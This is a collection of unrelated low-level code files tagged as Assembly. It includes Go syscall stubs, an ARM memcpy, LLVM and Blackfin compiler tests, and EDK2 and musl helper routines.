JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
TEXT ·SyscallNoError(SB),NOSPLIT,$0-48
CALL runtime·entersyscall(SB)
MOVQ a1+8(FP), DI
MOVQ a2+16(FP), SI
MOVQ a3+24(FP), DX
MOVQ $0, R10
MOVQ $0, R8
MOVQ $0, R9
MOVQ trap+0(FP), AX // syscall entry
SYSCALL
MOVQ AX, r1+32(FP)
MOVQ DX, r2+40(FP)
CALL runtime·exitsyscall(SB)
RET
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
TEXT ·RawSyscallNoError(SB),NOSPLIT,$0-48
MOVQ a1+8(FP), DI
MOVQ a2+16(FP), SI
MOVQ a3+24(FP), DX
MOVQ $0, R10
MOVQ $0, R8
MOVQ $0, R9
MOVQ trap+0(FP), AX // syscall entry
SYSCALL
MOVQ AX, r1+32(FP)
MOVQ DX, r2+40(FP)
RET
TEXT ·gettimeofday(SB),NOSPLIT,$0-16
JMP syscall·gettimeofday(SB)
| {
"language": "Assembly"
} |
.globl main
.globl Cmm.global_area
.globl Cmm.globalsig.aQOYZWMPACZAJaMABGMOZeCCPY
.section .data
/* memory for global registers */
Cmm.globalsig.aQOYZWMPACZAJaMABGMOZeCCPY:
Cmm.global_area:
.globl Cmm_stack_growth
.section .data
.align 4
Cmm_stack_growth:
.long 0xffffffff
.section .text
main:
leal -4(%esp), %esp
leal 4(%esp), %eax
movl $4,%ecx
addl %ecx,%eax
movl (%eax),%eax
leal 4(%esp), %eax
movl $8,%ecx
addl %ecx,%eax
movl (%eax),%eax
leal 4(%esp), %eax
movl (%eax),%eax
.Linitialize_continuations_l4:
.Lproc_body_start_l3:
movl $3,%ecx
movl %eax,(%esp)
movl %ecx,%eax
call tryout
.Lcall_successor_l11:
movl $4,%eax
call tryout
.Lcall_successor_l8:
movl $0,%eax
leal 4(%esp), %ecx
movl $0,%edx
addl %edx,%ecx
movl (%esp),%edx
movl %edx,(%ecx)
leal 4(%esp), %esp
ret
.section .pcmap_data
.Lstackdata_l17:
.long 0
.section .pcmap
.long .Lcall_successor_l11
.long .Lframe_l18
.section .pcmap_data
.Lframe_l18:
.long 0x80000004
.long 0xfffffffc
.long 0xfffffffc
.long .Lstackdata_l17
.long 0
.long 2
.long 0
.long 1
.long 0
.long 0
.long 0
.section .pcmap
.long .Lcall_successor_l8
.long .Lframe_l19
.section .pcmap_data
.Lframe_l19:
.long 0x80000004
.long 0xfffffffc
.long 0xfffffffc
.long .Lstackdata_l17
.long 0
.long 2
.long 0
.long 1
.long 0
.long 0
.long 0
.section .text
.section .text
tryout:
leal -20(%esp), %esp
leal 20(%esp), %ecx
movl (%ecx),%ecx
.Linitialize_continuations_l21:
.Lproc_body_start_l20:
.Lbranch_target_l29:
.Lbranch_target_l33:
movl $1,%edx
movl %eax,8(%esp)
andl %edx,%eax
movl $0,%edx
cmpl %edx,%eax
jne .Lbranch_target_l28
.Lbranch_target_l27:
leal z,%eax
jmp .Lbranch_target_l26
.Lbranch_target_l28:
leal nz,%eax
.Lbranch_target_l26:
leal 20(%esp), %edx
movl %eax,12(%esp)
movl $-20,%eax
addl %eax,%edx
movl 12(%esp),%eax
movl %eax,(%edx)
leal 20(%esp), %eax
movl $-16,%edx
addl %edx,%eax
movl 8(%esp),%edx
movl %edx,(%eax)
movl %ecx,16(%esp)
call printf
.Lcall_successor_l25:
leal 20(%esp), %eax
movl $0,%ecx
addl %ecx,%eax
movl 16(%esp),%ecx
movl %ecx,(%eax)
leal 20(%esp), %esp
ret
.section .pcmap_data
.Lstackdata_l36:
.long 0
.section .pcmap
.long .Lcall_successor_l25
.long .Lframe_l37
.section .pcmap_data
.Lframe_l37:
.long 0x80000004
.long 0xffffffec
.long 0xfffffffc
.long .Lstackdata_l36
.long 0
.long 2
.long 0
.long 1
.long 0
.long 0
.long 0
.section .text
.section .data
nz:
.byte 37
.byte 100
.byte 32
.byte 108
.byte 111
.byte 119
.byte 32
.byte 98
.byte 105
.byte 116
.byte 32
.byte 105
.byte 115
.byte 32
.byte 110
.byte 111
.byte 110
.byte 122
.byte 101
.byte 114
.byte 111
.byte 10
.byte 0
z:
.byte 37
.byte 100
.byte 32
.byte 108
.byte 111
.byte 119
.byte 32
.byte 98
.byte 105
.byte 116
.byte 32
.byte 105
.byte 115
.byte 32
.byte 122
.byte 101
.byte 114
.byte 111
.byte 10
.byte 0
| {
"language": "Assembly"
} |
//Original:/testcases/core/c_ldst_st_p_p/c_ldst_st_p_p.dsp
// Spec Reference: c_ldst st_p_p
# mach: bfin
.include "testutils.inc"
start
imm32 r0, 0x0a231507;
imm32 r1, 0x1b342618;
imm32 r2, 0x2c453729;
imm32 r3, 0x3d56483a;
imm32 r4, 0x4e67594b;
imm32 r5, 0x5f786a5c;
imm32 r6, 0x60897b6d;
imm32 r7, 0x719a8c7e;
// initial values p-p
imm32 p5, 0x0a231507;
imm32 p1, 0x1b342618;
imm32 p2, 0x2c453729;
loadsym p4, DATA_ADDR_5;
loadsym fp, DATA_ADDR_6;
[ P4 ] = P1;
[ FP ] = P2;
R5 = [ P4 ];
R6 = [ FP ];
CHECKREG r5, 0x1B342618;
CHECKREG r6, 0x2C453729;
[ P4 ] = P2;
[ FP ] = R3;
R5 = [ P4 ];
R6 = [ FP ];
CHECKREG r5, 0x2C453729;
CHECKREG r6, 0x3D56483A;
[ P4 ] = R3;
[ FP ] = P5;
R5 = [ P4 ];
R6 = [ FP ];
CHECKREG r5, 0x3D56483A;
CHECKREG r6, 0x0A231507;
pass
// Pre-load memory with known data
// More data is defined than will actually be used
.data
DATA_ADDR_1:
.dd 0x00010203
.dd 0x04050607
.dd 0x08090A0B
.dd 0x0C0D0E0F
.dd 0x10111213
.dd 0x14151617
.dd 0x18191A1B
.dd 0x1C1D1E1F
DATA_ADDR_2:
.dd 0x20212223
.dd 0x24252627
.dd 0x28292A2B
.dd 0x2C2D2E2F
.dd 0x30313233
.dd 0x34353637
.dd 0x38393A3B
.dd 0x3C3D3E3F
DATA_ADDR_3:
.dd 0x40414243
.dd 0x44454647
.dd 0x48494A4B
.dd 0x4C4D4E4F
.dd 0x50515253
.dd 0x54555657
.dd 0x58595A5B
.dd 0x5C5D5E5F
DATA_ADDR_4:
.dd 0x60616263
.dd 0x64656667
.dd 0x68696A6B
.dd 0x6C6D6E6F
.dd 0x70717273
.dd 0x74757677
.dd 0x78797A7B
.dd 0x7C7D7E7F
DATA_ADDR_5:
.dd 0x80818283
.dd 0x84858687
.dd 0x88898A8B
.dd 0x8C8D8E8F
.dd 0x90919293
.dd 0x94959697
.dd 0x98999A9B
.dd 0x9C9D9E9F
DATA_ADDR_6:
.dd 0xA0A1A2A3
.dd 0xA4A5A6A7
.dd 0xA8A9AAAB
.dd 0xACADAEAF
.dd 0xB0B1B2B3
.dd 0xB4B5B6B7
.dd 0xB8B9BABB
.dd 0xBCBDBEBF
DATA_ADDR_7:
.dd 0xC0C1C2C3
.dd 0xC4C5C6C7
.dd 0xC8C9CACB
.dd 0xCCCDCECF
.dd 0xD0D1D2D3
.dd 0xD4D5D6D7
.dd 0xD8D9DADB
.dd 0xDCDDDEDF
.dd 0xE0E1E2E3
.dd 0xE4E5E6E7
.dd 0xE8E9EAEB
.dd 0xECEDEEEF
.dd 0xF0F1F2F3
.dd 0xF4F5F6F7
.dd 0xF8F9FAFB
.dd 0xFCFDFEFF
| {
"language": "Assembly"
} |
.global llrintl
.type llrintl,@function
llrintl:
fldt 4(%esp)
fistpll 4(%esp)
mov 4(%esp),%eax
mov 8(%esp),%edx
ret
| {
"language": "Assembly"
} |
// Tests for instrumentation of C++ methods, constructors, and destructors.
// RUN: %clang %s -o - -emit-llvm -S -fprofile-instr-generate -fno-exceptions -target %itanium_abi_triple > %tgen
// RUN: FileCheck --input-file=%tgen -check-prefix=CTRGEN %s
// RUN: FileCheck --input-file=%tgen -check-prefix=DTRGEN %s
// RUN: FileCheck --input-file=%tgen -check-prefix=MTHGEN %s
// RUN: FileCheck --input-file=%tgen -check-prefix=WRPGEN %s
// RUN: llvm-profdata merge %S/Inputs/cxx-class.proftext -o %t.profdata
// RUN: %clang %s -o - -emit-llvm -S -fprofile-instr-use=%t.profdata -fno-exceptions -target %itanium_abi_triple > %tuse
// RUN: FileCheck --input-file=%tuse -check-prefix=CTRUSE %s
// RUN: FileCheck --input-file=%tuse -check-prefix=DTRUSE %s
// RUN: FileCheck --input-file=%tuse -check-prefix=MTHUSE %s
// RUN: FileCheck --input-file=%tuse -check-prefix=WRPUSE %s
class Simple {
int Member;
public:
// CTRGEN-LABEL: define {{.*}} @_ZN6SimpleC2Ei(
// CTRUSE-LABEL: define {{.*}} @_ZN6SimpleC2Ei(
// CTRGEN: store {{.*}} @[[SCC:__llvm_profile_counters__ZN6SimpleC2Ei]], i64 0, i64 0
explicit Simple(int Member) : Member(Member) {
// CTRGEN: store {{.*}} @[[SCC]], i64 0, i64 1
// CTRUSE: br {{.*}} !prof ![[SC1:[0-9]+]]
if (Member) {}
// CTRGEN-NOT: store {{.*}} @[[SCC]],
// CTRUSE-NOT: br {{.*}} !prof ![0-9]+
// CTRUSE: ret
}
// CTRUSE: ![[SC1]] = !{!"branch_weights", i32 100, i32 2}
// DTRGEN-LABEL: define {{.*}} @_ZN6SimpleD2Ev(
// DTRUSE-LABEL: define {{.*}} @_ZN6SimpleD2Ev(
// DTRGEN: store {{.*}} @[[SDC:__llvm_profile_counters__ZN6SimpleD2Ev]], i64 0, i64 0
~Simple() {
// DTRGEN: store {{.*}} @[[SDC]], i64 0, i64 1
// DTRUSE: br {{.*}} !prof ![[SD1:[0-9]+]]
if (Member) {}
// DTRGEN-NOT: store {{.*}} @[[SDC]],
// DTRUSE-NOT: br {{.*}} !prof ![0-9]+
// DTRUSE: ret
}
// DTRUSE: ![[SD1]] = !{!"branch_weights", i32 100, i32 2}
// MTHGEN-LABEL: define {{.*}} @_ZN6Simple6methodEv(
// MTHUSE-LABEL: define {{.*}} @_ZN6Simple6methodEv(
// MTHGEN: store {{.*}} @[[SMC:__llvm_profile_counters__ZN6Simple6methodEv]], i64 0, i64 0
void method() {
// MTHGEN: store {{.*}} @[[SMC]], i64 0, i64 1
// MTHUSE: br {{.*}} !prof ![[SM1:[0-9]+]]
if (Member) {}
// MTHGEN-NOT: store {{.*}} @[[SMC]],
// MTHUSE-NOT: br {{.*}} !prof ![0-9]+
// MTHUSE: ret
}
// MTHUSE: ![[SM1]] = !{!"branch_weights", i32 100, i32 2}
};
// WRPGEN-LABEL: define {{.*}} @_Z14simple_wrapperv(
// WRPUSE-LABEL: define {{.*}} @_Z14simple_wrapperv(
// WRPGEN: store {{.*}} @[[SWC:__llvm_profile_counters__Z14simple_wrapperv]], i64 0, i64 0
void simple_wrapper() {
// WRPGEN: store {{.*}} @[[SWC]], i64 0, i64 1
// WRPUSE: br {{.*}} !prof ![[SW1:[0-9]+]]
for (int I = 0; I < 100; ++I) {
Simple S(I);
S.method();
}
// WRPGEN-NOT: store {{.*}} @[[SWC]],
// WRPUSE-NOT: br {{.*}} !prof ![0-9]+
// WRPUSE: ret
}
// WRPUSE: ![[SW1]] = !{!"branch_weights", i32 101, i32 2}
int main(int argc, const char *argv[]) {
simple_wrapper();
return 0;
}
| {
"language": "Assembly"
} |
/*
* The MIT License
*
* Copyright (c) 2004-, Kohsuke Kawaguchi, Sun Microsystems, Inc., and a number of other of contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
/**
* Code that deals with HUDSON_HOME on EBS, which is used in
* conjunction with our EC2 launch wizard.
*
* <p>
* This should eventually move to its own plugin, but for
* now I'm putting this here.
*/
package hudson.plugins.ec2.ebs; | {
"language": "Assembly"
} |
/** @file
AsmReadMm6 function
Copyright (c) 2006 - 2008, Intel Corporation. All rights reserved.<BR>
This program and the accompanying materials
are licensed and made available under the terms and conditions of the BSD License
which accompanies this distribution. The full text of the license may be found at
http://opensource.org/licenses/bsd-license.php.
THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
**/
/**
Reads the current value of 64-bit MMX Register #6 (MM6).
Reads and returns the current value of MM6. This function is only available
on IA-32 and x64.
@return The current value of MM6.
**/
UINT64
EFIAPI
AsmReadMm6 (
VOID
)
{
_asm {
push eax
push eax
movq [esp], mm6
pop eax
pop edx
emms
}
}
| {
"language": "Assembly"
} |
/*
* Copyright (c) 2014 ARM Ltd
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the company may not be used to endorse or promote
* products derived from this software without specific prior written
* permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LTD ``AS IS'' AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL ARM LTD BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "acle-compat.h"
/* NOTE: This ifdef MUST match the one in aeabi_memcpy.c. */
#if defined (__ARM_ARCH_7A__) && defined (__ARM_FEATURE_UNALIGNED) && \
(defined (__ARM_NEON__) || !defined (__SOFTFP__))
.syntax unified
.global __aeabi_memcpy
.type __aeabi_memcpy, %function
__aeabi_memcpy:
/* Assumes that n >= 0, and dst, src are valid pointers.
If there is at least 8 bytes to copy, use LDRD/STRD.
If src and dst are misaligned with different offsets,
first copy byte by byte until dst is aligned,
and then copy using LDRD/STRD and shift if needed.
When less than 8 left, copy a word and then byte by byte. */
/* Save registers (r0 holds the return value):
optimized push {r0, r4, r5, lr}.
To try and improve performance, stack layout changed,
i.e., not keeping the stack looking like users expect
(highest numbered register at highest address). */
push {r0, lr}
strd r4, r5, [sp, #-8]!
/* Get copying of tiny blocks out of the way first. */
/* Is there at least 4 bytes to copy? */
subs r2, r2, #4
blt copy_less_than_4 /* If n < 4. */
/* Check word alignment. */
ands ip, r0, #3 /* ip = last 2 bits of dst. */
bne dst_not_word_aligned /* If dst is not word-aligned. */
/* Get here if dst is word-aligned. */
ands ip, r1, #3 /* ip = last 2 bits of src. */
bne src_not_word_aligned /* If src is not word-aligned. */
word_aligned:
/* Get here if source and dst both are word-aligned.
The number of bytes remaining to copy is r2+4. */
/* Is there is at least 64 bytes to copy? */
subs r2, r2, #60
blt copy_less_than_64 /* If r2 + 4 < 64. */
/* First, align the destination buffer to 8-bytes,
to make sure double loads and stores don't cross cache line boundary,
as they are then more expensive even if the data is in the cache
(require two load/store issue cycles instead of one).
If only one of the buffers is not 8-bytes aligned,
then it's more important to align dst than src,
because there is more penalty for stores
than loads that cross cacheline boundary.
This check and realignment are only worth doing
if there is a lot to copy. */
/* Get here if dst is word aligned,
i.e., the 2 least significant bits are 0.
If dst is not 2w aligned (i.e., the 3rd bit is not set in dst),
then copy 1 word (4 bytes). */
ands r3, r0, #4
beq two_word_aligned /* If dst already two-word aligned. */
ldr r3, [r1], #4
str r3, [r0], #4
subs r2, r2, #4
blt copy_less_than_64
two_word_aligned:
/* TODO: Align to cacheline (useful for PLD optimization). */
/* Every loop iteration copies 64 bytes. */
1:
.irp offset, #0, #8, #16, #24, #32, #40, #48, #56
ldrd r4, r5, [r1, \offset]
strd r4, r5, [r0, \offset]
.endr
add r0, r0, #64
add r1, r1, #64
subs r2, r2, #64
bge 1b /* If there is more to copy. */
copy_less_than_64:
/* Get here if less than 64 bytes to copy, -64 <= r2 < 0.
Restore the count if there is more than 7 bytes to copy. */
adds r2, r2, #56
blt copy_less_than_8
/* Copy 8 bytes at a time. */
2:
ldrd r4, r5, [r1], #8
strd r4, r5, [r0], #8
subs r2, r2, #8
bge 2b /* If there is more to copy. */
copy_less_than_8:
/* Get here if less than 8 bytes to copy, -8 <= r2 < 0.
Check if there is more to copy. */
cmn r2, #8
beq return /* If r2 + 8 == 0. */
/* Restore the count if there is more than 3 bytes to copy. */
adds r2, r2, #4
blt copy_less_than_4
/* Copy 4 bytes. */
ldr r3, [r1], #4
str r3, [r0], #4
copy_less_than_4:
/* Get here if less than 4 bytes to copy, -4 <= r2 < 0. */
/* Restore the count, check if there is more to copy. */
adds r2, r2, #4
beq return /* If r2 == 0. */
/* Get here with r2 is in {1,2,3}={01,10,11}. */
/* Logical shift left r2, insert 0s, update flags. */
lsls r2, r2, #31
/* Copy byte by byte.
Condition ne means the last bit of r2 is 0.
Condition cs means the second to last bit of r2 is set,
i.e., r2 is 1 or 3. */
itt ne
ldrbne r3, [r1], #1
strbne r3, [r0], #1
itttt cs
ldrbcs r4, [r1], #1
ldrbcs r5, [r1]
strbcs r4, [r0], #1
strbcs r5, [r0]
return:
/* Restore registers: optimized pop {r0, r4, r5, pc} */
ldrd r4, r5, [sp], #8
pop {r0, pc} /* This is the only return point of memcpy. */
dst_not_word_aligned:
/* Get here when dst is not aligned and ip has the last 2 bits of dst,
i.e., ip is the offset of dst from word.
The number of bytes that remains to copy is r2 + 4,
i.e., there are at least 4 bytes to copy.
Write a partial word (0 to 3 bytes), such that dst becomes
word-aligned. */
/* If dst is at ip bytes offset from a word (with 0 < ip < 4),
then there are (4 - ip) bytes to fill up to align dst to the next
word. */
rsb ip, ip, #4 /* ip = #4 - ip. */
cmp ip, #2
/* Copy byte by byte with conditionals. */
itt gt
ldrbgt r3, [r1], #1
strbgt r3, [r0], #1
itt ge
ldrbge r4, [r1], #1
strbge r4, [r0], #1
ldrb lr, [r1], #1
strb lr, [r0], #1
/* Update the count.
ip holds the number of bytes we have just copied. */
subs r2, r2, ip /* r2 = r2 - ip. */
blt copy_less_than_4 /* If r2 < ip. */
/* Get here if there are more than 4 bytes to copy.
Check if src is aligned. If beforehand src and dst were not word
aligned but congruent (same offset), then now they are both
word-aligned, and we can copy the rest efficiently (without
shifting). */
ands ip, r1, #3 /* ip = last 2 bits of src. */
beq word_aligned /* If r1 is word-aligned. */
src_not_word_aligned:
/* Get here when src is not word-aligned, but dst is word-aligned.
The number of bytes that remains to copy is r2+4. */
/* Copy word by word using LDR when alignment can be done in hardware,
i.e., SCTLR.A is set, supporting unaligned access in LDR and STR. */
subs r2, r2, #60
blt 8f
7:
/* Copy 64 bytes in every loop iteration. */
.irp offset, #0, #4, #8, #12, #16, #20, #24, #28, #32, #36, #40, #44, #48, #52, #56, #60
ldr r3, [r1, \offset]
str r3, [r0, \offset]
.endr
add r0, r0, #64
add r1, r1, #64
subs r2, r2, #64
bge 7b
8:
/* Get here if less than 64 bytes to copy, -64 <= r2 < 0.
Check if there is more than 3 bytes to copy. */
adds r2, r2, #60
blt copy_less_than_4
9:
/* Get here if there is less than 64 but at least 4 bytes to copy,
where the number of bytes to copy is r2+4. */
ldr r3, [r1], #4
str r3, [r0], #4
subs r2, r2, #4
bge 9b
b copy_less_than_4
.syntax unified
.global __aeabi_memcpy4
.type __aeabi_memcpy4, %function
__aeabi_memcpy4:
/* Assumes that both of its arguments are 4-byte aligned. */
push {r0, lr}
strd r4, r5, [sp, #-8]!
/* Is there at least 4 bytes to copy? */
subs r2, r2, #4
blt copy_less_than_4 /* If n < 4. */
bl word_aligned
.syntax unified
.global __aeabi_memcpy8
.type __aeabi_memcpy8, %function
__aeabi_memcpy8:
/* Assumes that both of its arguments are 8-byte aligned. */
push {r0, lr}
strd r4, r5, [sp, #-8]!
/* Is there at least 4 bytes to copy? */
subs r2, r2, #4
blt copy_less_than_4 /* If n < 4. */
/* Is there at least 8 bytes to copy? */
subs r2, r2, #4
blt copy_less_than_8 /* If n < 8. */
/* Is there at least 64 bytes to copy? */
subs r2, r2, #56
blt copy_less_than_64 /* if n + 8 < 64. */
bl two_word_aligned
#endif
| {
"language": "Assembly"
} |
; RUN: opt < %s -instcombine -S | FileCheck %s
; FIXME: Some of these tests belong in InstSimplify.
; Integer BitWidth <= 64 && BitWidth % 8 != 0.
define i39 @test0(i39 %A) {
; CHECK-LABEL: @test0(
; CHECK-NEXT: ret i39 0
;
%B = and i39 %A, 0 ; zero result
ret i39 %B
}
define i15 @test2(i15 %x) {
; CHECK-LABEL: @test2(
; CHECK-NEXT: ret i15 %x
;
%tmp.2 = and i15 %x, -1 ; noop
ret i15 %tmp.2
}
define i23 @test3(i23 %x) {
; CHECK-LABEL: @test3(
; CHECK-NEXT: ret i23 0
;
%tmp.0 = and i23 %x, 127
%tmp.2 = and i23 %tmp.0, 128
ret i23 %tmp.2
}
define i1 @test4(i37 %x) {
; CHECK-LABEL: @test4(
; CHECK-NEXT: [[B:%.*]] = icmp ugt i37 %x, 2147483647
; CHECK-NEXT: ret i1 [[B]]
;
%A = and i37 %x, -2147483648
%B = icmp ne i37 %A, 0
ret i1 %B
}
define i7 @test5(i7 %A, i7* %P) {
; CHECK-LABEL: @test5(
; CHECK-NEXT: [[B:%.*]] = or i7 %A, 3
; CHECK-NEXT: [[C:%.*]] = xor i7 [[B]], 12
; CHECK-NEXT: store i7 [[C]], i7* %P, align 1
; CHECK-NEXT: ret i7 3
;
%B = or i7 %A, 3
%C = xor i7 %B, 12
store i7 %C, i7* %P
%r = and i7 %C, 3
ret i7 %r
}
define i47 @test7(i47 %A) {
; CHECK-LABEL: @test7(
; CHECK-NEXT: [[TMP1:%.*]] = lshr i47 %A, 39
; CHECK-NEXT: ret i47 [[TMP1]]
;
%X = ashr i47 %A, 39 ;; sign extend
%C1 = and i47 %X, 255
ret i47 %C1
}
; Integer BitWidth > 64 && BitWidth <= 1024.
define i999 @test8(i999 %A) {
; CHECK-LABEL: @test8(
; CHECK-NEXT: ret i999 0
;
%B = and i999 %A, 0 ; zero result
ret i999 %B
}
define i1005 @test9(i1005 %x) {
; CHECK-LABEL: @test9(
; CHECK-NEXT: ret i1005 %x
;
%tmp.2 = and i1005 %x, -1 ; noop
ret i1005 %tmp.2
}
define i123 @test10(i123 %x) {
; CHECK-LABEL: @test10(
; CHECK-NEXT: ret i123 0
;
%tmp.0 = and i123 %x, 127
%tmp.2 = and i123 %tmp.0, 128
ret i123 %tmp.2
}
define i1 @test11(i737 %x) {
; CHECK-LABEL: @test11(
; CHECK-NEXT: [[B:%.*]] = icmp ugt i737 %x, 2147483647
; CHECK-NEXT: ret i1 [[B]]
;
%A = and i737 %x, -2147483648
%B = icmp ne i737 %A, 0
ret i1 %B
}
define i117 @test12(i117 %A, i117* %P) {
; CHECK-LABEL: @test12(
; CHECK-NEXT: [[B:%.*]] = or i117 %A, 3
; CHECK-NEXT: [[C:%.*]] = xor i117 [[B]], 12
; CHECK-NEXT: store i117 [[C]], i117* %P, align 4
; CHECK-NEXT: ret i117 3
;
%B = or i117 %A, 3
%C = xor i117 %B, 12
store i117 %C, i117* %P
%r = and i117 %C, 3
ret i117 %r
}
define i1024 @test13(i1024 %A) {
; CHECK-LABEL: @test13(
; CHECK-NEXT: [[TMP1:%.*]] = lshr i1024 %A, 1016
; CHECK-NEXT: ret i1024 [[TMP1]]
;
%X = ashr i1024 %A, 1016 ;; sign extend
%C1 = and i1024 %X, 255
ret i1024 %C1
}
| {
"language": "Assembly"
} |
// Check dumping of the resources stored in .res files.
// The input was generated with the following commands, using the original Windows
// rc.exe:
// > rc /fo test_resource.res /nologo test_resource.rc
// RUN: llvm-readobj %p/Inputs/resources/test_resource.res | FileCheck %s
// CHECK: Resource type (int): 9
// CHECK-NEXT: Resource name (string): MYACCELERATORS
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x30
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 24
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 11000300 E7030000 0D004400 4C040000 |..........D.L...|
// CHECK-NEXT: 0010: 82001200 BC010000 |........|
// CHECK-NEXT: )
// CHECK-DAG: Resource type (int): 2
// CHECK-NEXT: Resource name (string): CURSOR
// CHECK-NEXT: Data version: 0
// CHECK-NEXT: Memory flags: 0x30
// CHECK-NEXT: Language ID: 1033
// CHECK-NEXT: Version (major): 0
// CHECK-NEXT: Version (minor): 0
// CHECK-NEXT: Characteristics: 0
// CHECK-NEXT: Data size: 808
// CHECK-NEXT: Data: (
// CHECK-NEXT: 0000: 28000000 10000000 10000000 01001800 |(...............|
// CHECK-NEXT: 0010: 00000000 00030000 C40E0000 C40E0000 |................|
// CHECK-NEXT: 0020: 00000000 00000000 FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0030: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0040: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0050: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0060: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0070: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0080: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0090: FFFFFFFF FFFFFFFF FFFFFFFF FF7F7F7F |................|
// CHECK-NEXT: 00A0: 7C7C7C78 78787575 75FFFFFF FFFFFFFF ||||xxxuuu.......|
// CHECK-NEXT: 00B0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 00C0: FFFFFFFF 979797FF FFFFFFFF FF838383 |................|
// CHECK-NEXT: 00D0: AAAAAADB DBDB7979 79757575 FFFFFFFF |......yyyuuu....|
// CHECK-NEXT: 00E0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 00F0: FFFFFFFF 9C9C9C98 9898FFFF FF888888 |................|
// CHECK-NEXT: 0100: DBDBDBB7 B7B77D7D 7DFFFFFF FFFFFFFF |......}}}.......|
// CHECK-NEXT: 0110: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0120: FFFFFFFF A0A0A09C 9C9C9393 93ADADAD |................|
// CHECK-NEXT: 0130: F2F2F284 84848181 81FFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0140: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0150: FFFFFFFF A4A4A4D7 D7D79D9D 9DD0D0D0 |................|
// CHECK-NEXT: 0160: EEEEEE91 91918D8D 8DFFFFFF FFFFFF81 |................|
// CHECK-NEXT: 0170: 81817E7E 7EFFFFFF FFFFFFFF FFFFFFFF |..~~~...........|
// CHECK-NEXT: 0180: FFFFFFFF A9A9A9F2 F2F2E5E5 E5E2E2E2 |................|
// CHECK-NEXT: 0190: 95959591 91918D8D 8D898989 868686FF |................|
// CHECK-NEXT: 01A0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 01B0: FFFFFFFF ADADADF2 F2F2E1E1 E1DFDFDF |................|
// CHECK-NEXT: 01C0: E7E7E7E4 E4E4BBBB BB8E8E8E FFFFFFFF |................|
// CHECK-NEXT: 01D0: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 01E0: FFFFFFFF B5B5B5F2 F2F2E8E8 E8E7E7E7 |................|
// CHECK-NEXT: 01F0: EAEAEAC6 C6C69E9E 9EFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0200: FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |................|
// CHECK-NEXT: 0210: FFFFFFFF B9B9B9F4 F4F4ECEC ECEDEDED |................|
